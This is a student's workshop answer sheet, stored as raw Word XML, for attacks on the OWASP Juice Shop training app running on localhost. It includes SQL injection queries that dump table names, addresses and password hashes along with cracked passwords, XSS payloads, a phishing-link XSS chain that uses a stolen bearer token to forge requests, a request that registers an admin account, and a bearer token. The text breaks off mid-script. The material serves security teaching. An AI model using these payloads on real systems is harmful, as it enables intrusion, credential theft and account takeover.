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58451" w14:textId="6865CAEB" w:rsidR="00ED18D3" w:rsidRDefault="00ED18D3" w:rsidP="00ED18D3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Workshop -1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F1E4EE" w14:textId="15FB0F52" w:rsidR="00E728CC" w:rsidRDefault="002600F4" w:rsidP="002600F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using the SQL injection, determine the entire database schema definition. For this exercise, the table names are sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6232AA0A" w14:textId="07134DFF" w:rsidR="002600F4" w:rsidRPr="00DD5DE0" w:rsidRDefault="00000000" w:rsidP="002600F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history="1">
        <w:r w:rsidR="00212BDC" w:rsidRPr="008A65F1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:3000/rest/products/search?q=%27))%20UNION%20SELECT%20sql,2,3,4,5,6,7,8,9%20FROM%20sqlite_master--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A776AC1" w14:textId="18E76EAC" w:rsidR="00DD5DE0" w:rsidRDefault="00242712" w:rsidP="00242712">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>UNION SELECT sql,2,3,4,5,6,7,8,9</w:t>
      </w:r>
      <w:r w:rsidR="00511F44">
        <w:t xml:space="preserve"> FROM sqlite_master--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434519BF" w14:textId="5410A5D1" w:rsidR="00212BDC" w:rsidRDefault="00212BDC" w:rsidP="00212BDC">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tables: </w:t>
      </w:r>
      <w:r w:rsidR="0037139D" w:rsidRPr="0037139D">
        <w:t>Addresses</w:t>
      </w:r>
      <w:r w:rsidR="0037139D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C90F76">
        <w:t>BasketItems, Baskets, Captchas, Cards, Challenges, Complaints, Deliveries, Feedbacks, ImageCaptchas, Memories, PrivacyRequests, Products, Quantities, Recycles, SecurityAnswers, SecurityQuestions</w:t>
      </w:r>
      <w:r w:rsidR="00701504">
        <w:t>, Users, Wallets, sqlite_sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725170A5" w14:textId="67074703" w:rsidR="00701504" w:rsidRDefault="00914DF1" w:rsidP="00701504">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00914DF1">
        <w:t>Determine which products are no longer available for sale within the Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295FC9BE" w14:textId="18DF066C" w:rsidR="00914DF1" w:rsidRDefault="00914DF1" w:rsidP="00914DF1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Item id: 10</w:t>
      </w:r>
      <w:r w:rsidR="006A6992">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="006A6992" w:rsidRPr="006A6992">
        <w:t>Christmas Super-Surprise-Box (2014 Edition)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006A6992">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00347BB4">
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00167C64">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00167C64" w:rsidRPr="00167C64">
        <w:t>Rippertuer Special Juice</w:t>
      </w:r>
      <w:r w:rsidR="00167C64">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006A6992">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00347BB4">
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00167C64">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00167C64" w:rsidRPr="00167C64">
        <w:t>OWASP Juice Shop Sticker (2015/2016 design)</w:t>
      </w:r>
      <w:r w:rsidR="00347BB4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006A6992">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00347BB4">
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="00E1324B">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E1324B" w:rsidRPr="00E1324B">
        <w:t>Juice Shop Artwork</w:t>
      </w:r>
      <w:r w:rsidR="00E1324B">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00347BB4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006A6992">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00347BB4">
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidR="00E1324B">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E1324B" w:rsidRPr="00E1324B">
        <w:t>Global OWASP WASPY Award 2017 Nomination</w:t>
      </w:r>
      <w:r w:rsidR="00E1324B">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00347BB4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006A6992">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00347BB4">
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="00E1324B">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E1324B" w:rsidRPr="00E1324B">
        <w:t>OWASP Juice Shop Sweden Tour 2017 Sticker Sheet (Special Edition)</w:t>
      </w:r>
      <w:r w:rsidR="00E1324B">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00347BB4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006A6992">
        <w:br/>
      </w:r>
      <w:r w:rsidR="007B6E63">
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidR="00745A56">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00745A56" w:rsidRPr="00745A56">
        <w:t>Juice Shop Adversary Trading Card (Common)</w:t>
      </w:r>
      <w:r w:rsidR="00745A56">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="007B6E63">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006A6992">
        <w:br/>
      </w:r>
      <w:r w:rsidR="007B6E63">
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="00745A56">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00745A56" w:rsidRPr="00745A56">
        <w:t>Juice Shop Adversary Trading Card (Super Rare)</w:t>
      </w:r>
      <w:r w:rsidR="00745A56">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="007B6E63">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006A6992">
        <w:br/>
      </w:r>
      <w:r w:rsidR="007B6E63">
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidR="00654ABC">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00654ABC" w:rsidRPr="00654ABC">
        <w:t>20th Anniversary Celebration Ticket</w:t>
      </w:r>
      <w:r w:rsidR="00654ABC">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6FB951" w14:textId="248D95AF" w:rsidR="0069169C" w:rsidRDefault="00410F3E" w:rsidP="0069169C">
      <w:r>
        <w:t xml:space="preserve">[[ ^^ </w:t>
      </w:r>
      <w:r w:rsidR="00EF6A5B">
        <w:t>find sold out ones, instead of deleted items]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2FD8E7" w14:textId="3BA20D21" w:rsidR="0069169C" w:rsidRDefault="00ED7C4A" w:rsidP="0069169C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7C4A">
        <w:t>From the Addresses table, access the fullName, zipCode, and mobileNum fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD769EA" w14:textId="1F3BD1F2" w:rsidR="009F1ED6" w:rsidRDefault="00000000" w:rsidP="009F1ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="009F1ED6" w:rsidRPr="008A65F1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:3000/rest/products/search?q=%27))%20UNION%20SELECT%20fullName,zipCode,mobileNum,4,5,6,7,8,9%20FROM%20Addresses--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28F62E96" w14:textId="38DD1DC4" w:rsidR="00511F44" w:rsidRDefault="00511F44" w:rsidP="009F1ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT </w:t>
      </w:r>
      <w:r w:rsidR="003D7932">
        <w:t>fullName,zipCode,mobileNum,4,5,6,7,8,9 FROM Addresses—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB918D6" w14:textId="77777777" w:rsidR="003D7932" w:rsidRDefault="003D7932" w:rsidP="009F1ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F8DA63" w14:textId="018D68B2" w:rsidR="009F1ED6" w:rsidRDefault="00800212" w:rsidP="009F1ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Administrator, 4711, </w:t>
      </w:r>
      <w:r w:rsidRPr="00800212">
        <w:t>1234567890</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581CEA49" w14:textId="5D211236" w:rsidR="00800212" w:rsidRDefault="00800212" w:rsidP="009F1ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bender, 10001, </w:t>
      </w:r>
      <w:r w:rsidR="00DF3B97" w:rsidRPr="00DF3B97">
        <w:t>797675345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E4444" w14:textId="59B85F5E" w:rsidR="00DF3B97" w:rsidRDefault="00DF3B97" w:rsidP="009F1ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF3B97">
        <w:t>Bjoern Kimminich</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 25436, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3B97">
        <w:t>4917000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B10AAE" w14:textId="46B747D9" w:rsidR="00DF3B97" w:rsidRDefault="00DF3B97" w:rsidP="009F1ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF3B97">
        <w:t>Jim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 1701, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3B97">
        <w:t>523423432</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D66972" w14:textId="47728B9D" w:rsidR="00DF3B97" w:rsidRDefault="00DF3B97" w:rsidP="009F1ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sam, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3B97">
        <w:t>GSK783</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00983FDD" w:rsidRPr="00983FDD">
        <w:t>1000000783</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC65679" w14:textId="2C9A27F9" w:rsidR="00983FDD" w:rsidRDefault="00983FDD" w:rsidP="009F1ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00983FDD">
        <w:t>Tim Tester</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 12345, </w:t>
      </w:r>
      <w:r w:rsidRPr="00983FDD">
        <w:t>4917000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF5A0A5" w14:textId="77777777" w:rsidR="00A04B61" w:rsidRDefault="00A04B61" w:rsidP="00A04B61"/>
    <w:p w14:paraId="6072E038" w14:textId="50CDFF4E" w:rsidR="00A04B61" w:rsidRDefault="00A04B61" w:rsidP="00A04B61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04B61">
        <w:t>Find one other plaintext password for a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BE6362" w14:textId="19721623" w:rsidR="00A04B61" w:rsidRDefault="00000000" w:rsidP="00A04B61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="001C22AF" w:rsidRPr="001C22AF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:3000/rest/products/search?q=xyz')) UNION SELECT email, password, '3', '4', '5', '6', '7', '8', '9' FROM users--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="436D225A" w14:textId="77777777" w:rsidR="003D7932" w:rsidRDefault="003D7932" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E97020" w14:textId="15CBB861" w:rsidR="001C22AF" w:rsidRDefault="001C22AF" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User name: </w:t>
      </w:r>
      <w:r w:rsidR="00037995" w:rsidRPr="00037995">
        <w:t xml:space="preserve">jim@juice-sh.op </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7528C400" w14:textId="4E6AA246" w:rsidR="00D05E41" w:rsidRDefault="00D05E41" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password (Hashed): </w:t>
      </w:r>
      <w:r w:rsidR="00037995" w:rsidRPr="00037995">
        <w:t>e541ca7ecf72b8d1286474fc613e5e45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520E1FC" w14:textId="4180EBCB" w:rsidR="00D05E41" w:rsidRDefault="00D05E41" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password(Plaintext): </w:t>
      </w:r>
      <w:r w:rsidR="00350CB1" w:rsidRPr="00350CB1">
        <w:t>ncc-1701</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3617044B" w14:textId="77777777" w:rsidR="001C22AF" w:rsidRDefault="001C22AF" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D282E7A" w14:textId="09DE34C1" w:rsidR="004103EB" w:rsidRDefault="004103EB" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E80CF4" w14:textId="4980D1D7" w:rsidR="004103EB" w:rsidRDefault="004103EB" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidR="003D6DC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D6DC1" w:rsidRPr="003D6DC1">
        <w:t>demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A770F76" w14:textId="6B5F76BE" w:rsidR="004103EB" w:rsidRDefault="004103EB" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password(Hashed): </w:t>
      </w:r>
      <w:r w:rsidRPr="004103EB">
        <w:t>fe01ce2a7fbac8fafaed7c982a04e229</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE103D6" w14:textId="68814429" w:rsidR="004103EB" w:rsidRDefault="004103EB" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Password(plaintext): demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DEECA9" w14:textId="77777777" w:rsidR="00595380" w:rsidRDefault="00595380" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39165245" w14:textId="43D41497" w:rsidR="00595380" w:rsidRDefault="00595380" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These are the only 2 available ( why?) others say not found on the hash cracking website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7529AD3D" w14:textId="77777777" w:rsidR="00ED18D3" w:rsidRDefault="00ED18D3" w:rsidP="001C22AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103A929C" w14:textId="011720DA" w:rsidR="00ED18D3" w:rsidRDefault="00ED18D3" w:rsidP="00ED18D3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Workshop -2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2225D9FB" w14:textId="11507782" w:rsidR="00D93624" w:rsidRDefault="00D93624" w:rsidP="007E1190">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D93624">
        <w:t>Generate a XSS attack that creates a popup alert with the user’s cookie information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03300BBE" w14:textId="17E47CA8" w:rsidR="00ED18D3" w:rsidRDefault="007E1190" w:rsidP="00D93624">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1190">
        <w:t>&lt;iframe src="javascript:alert(</w:t>
      </w:r>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1190">
        <w:t>)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68433D25" w14:textId="1C930AAF" w:rsidR="00D93624" w:rsidRDefault="00070602" w:rsidP="00D93624">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use XSS to redirect a user to the NCSU Computer Science homepage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4132A192" w14:textId="3D96CC1C" w:rsidR="00070602" w:rsidRDefault="00050CC7" w:rsidP="00070602">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00050CC7">
        <w:t>&lt;img src="x"onerror=window.open("https://www.csc.ncsu.edu/","xss",'height=500,width=500');</w:t>
      </w:r>
      <w:r w:rsidR="00653518">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B43610F" w14:textId="5559DCF7" w:rsidR="00750835" w:rsidRPr="009F21F0" w:rsidRDefault="00750835" w:rsidP="00070602">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00050CC7">
        <w:t>&lt;img src="x"onerror=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window.open("</w:t>
      </w:r>
      <w:r w:rsidRPr="00050CC7">
        <w:t>https://www.csc.ncsu.edu/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","_self")</w:t>
      </w:r>
      <w:r w:rsidR="001D2AF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246010DC" w14:textId="77777777" w:rsidR="009F21F0" w:rsidRDefault="009F21F0" w:rsidP="009F21F0"/>
    <w:p w14:paraId="44A34E3F" w14:textId="3528EA08" w:rsidR="009F21F0" w:rsidRDefault="009F21F0" w:rsidP="009F21F0">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Workshop-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A60E83" w14:textId="77777777" w:rsidR="00D80852" w:rsidRDefault="00D80852" w:rsidP="00D80852">
      <w:r>
        <w:t>1) User will receive a phishing email , asking them to click on a link to track shipment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A876DD6" w14:textId="77777777" w:rsidR="00D80852" w:rsidRDefault="00D80852" w:rsidP="00D80852">
      <w:r>
        <w:t>2) When user clicks on the link , which will be - http://localhost:3000/#/trackresult?id=&lt;iframe src="javascript: xmlhttp = new XMLHttpRequest();xmlhttp.onreadystatechange = function(){  id= JSON.parse(this.response).user.id; xhr = new XMLHttpRequest(); xhr.open('POST', ' http://localhost:3000/api/Complaints/'); xhr.setRequestHeader('Authorization',`Bearer ${localStorage.getItem('token')}`); xhr.setRequestHeader(`Content-type`, `application/json`); xhr.send(JSON.stringify({UserId: id, message:`UGotFooled`})); };xmlhttp.open('GET','http://localhost:3000/rest/user/whoami'); xmlhttp.setRequestHeader('Authorization',`Bearer=${localStorage.getItem('token')}`); xmlhttp.send();"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388D9810" w14:textId="77777777" w:rsidR="00D80852" w:rsidRDefault="00D80852" w:rsidP="00D80852">
      <w:r>
        <w:t>3. This will first send a request to the endpoint - http://localhost:3000/rest/user/whoami, to retrieve the user's id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0F7841" w14:textId="77777777" w:rsidR="00D80852" w:rsidRDefault="00D80852" w:rsidP="00D80852">
      <w:r>
        <w:t>4. 4) Then a request will be sent to the complaint endpoint - http://localhost:3000/api/Complaints/, containing the user's id and bogus complaint message as its payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710E730" w14:textId="0B85124F" w:rsidR="00246DD9" w:rsidRDefault="00D80852" w:rsidP="00D80852">
      <w:r>
        <w:t>5) The message will be = "UGotFooled". Hence, a CSRF attack will be performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234441A0" w14:textId="0C9659AA" w:rsidR="00D80852" w:rsidRDefault="00D80852">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFA8D9E" w14:textId="139FA07C" w:rsidR="00D80852" w:rsidRDefault="00D80852" w:rsidP="00D80852">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Workshop-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBFE634" w14:textId="5F80C021" w:rsidR="00246DD9" w:rsidRDefault="00246DD9" w:rsidP="009C3B3C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CDCDCD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="202124"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Request Header Authorization: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CDCDCD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="202124"/>
        </w:rPr>
        <w:t>Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.ZOWU79exm6IpgviKfWftA0DOVq_4zQEx7KkGgGMy32foy9BdsYNrc4qEYz3I47sW3_9agV2QZxdNhwYvGVujGN5dt0pOF6c_7mZeL5aj_8smsIDRuZqOwCMdbiQH6k5QXKUaIr2ukZGUkRKA4M64-F_O-D832rR2MiXKpMMig1k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6703B3E7" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="003A4441" w:rsidP="00866FDB">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00866FDB">
        <w:t>fetch('http://localhost:3000/api/Users', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1419891A" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t xml:space="preserve"> method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AD584D" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t xml:space="preserve"> body: JSON.stringify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F21621B" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t xml:space="preserve"> email: "admin123@gmail.com", password:"admin", role:"admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBD815E" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t xml:space="preserve"> }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718F200" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t xml:space="preserve"> headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308D7C6" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t xml:space="preserve"> 'Content-type': 'application/json; charset=UTF-8',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A7E61" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t xml:space="preserve"> 'Authorization': 'Bearer &lt;YOUR TOKEN HERE&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DF129A" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D95CBC" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C77A61" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t>.then(res =&gt; res.json())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB344DA" w14:textId="29AEAC2A" w:rsidR="003A4441" w:rsidRDefault="00866FDB" w:rsidP="00866FDB">
      <w:r>
        <w:t>.then(console.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD698B7" w14:textId="77777777" w:rsidR="00866FDB" w:rsidRDefault="00866FDB" w:rsidP="00866FDB"/>
    <w:p w14:paraId="38FC1AF7" w14:textId="40BA85FE" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t>2.  var input = document.querySelector('input[type="file"]')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA352A4" w14:textId="77777777" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t>var data = new FormData()</w:t>
      </w:r>
    </w:p>
